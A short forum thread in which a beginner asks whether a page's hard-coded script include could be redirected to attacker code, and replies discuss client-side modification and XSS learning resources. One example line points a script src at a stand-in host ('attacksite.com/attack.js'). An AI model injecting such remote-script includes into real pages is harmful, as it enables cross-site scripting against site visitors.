Javascript XSS vulnerability
Just a thought I had, But I'm not too good with Javascript or Javascript vulnerabilities but I know the basics pretty well. Anyway theoretically lets say there is a web page that executes a script when the web page loads in a separate directory on the server. So that the HTML code would look like this:
markupsrc="file:///C:/Javascripts/MyScript.js">
To me… This just seems very vulnerable to a XSS attack if you can change the src example:
markupsrc="http://www.attacksite.com/attack.js">
But to my knowledge the javascript is hard coded into the HTML and cannot be changed. Any ideas if you can actually change the the path to the script or am I safe?
You can't change the hard-coded (no variable) settings. Oh, and you're not safe.
Edit: Actually, you can change hard-coded settings if you can regex+replace with some XSS.
Anyway, stop asking and start learning. I advise ha.ckers.org and sla.ckers.org if you want to learn about XSS, and Webappsec in general.
leoneo11 wrote: But to my knowledge the javascript is hard coded into the HTML and cannot be changed. Any ideas if you can actually change the the path to the script or am I safe?
Both the Javascript and the Javascript include can be changed if you're rendering the page in something that lets you modify the source in place (PHP cURL, C# w/ MSHTML, even Opera should). I used to do this with MSHTML and my last workplace's CMS to automate the page while eliminating those pesky JS pop-ups. HTML and Javascript are both client-side once they're rendered… which is why GreaseMonkey even works.
leoneo11 wrote: Anyway theoretically lets say there is a web page that executes a script when the web page loads in a separate directory on the server. So that the HTML code would look like this:
markupsrc="file:///C:/Javascripts/MyScript.js">
I'd say this wouldn't work, since the javascript is executed on the client's computer and not on the server. It'd rather look like this:
markup<script src="Javascripts/MyScript.js">
To me… This just seems very vulnerable to a XSS attack if you can change the src example:
markupsrc="http://www.attacksite.com/attack.js">
I understand what you mean, but you can't simply edit a hard coded HTML file just like that. Like spyware said, practical experience is very good. Get training ;)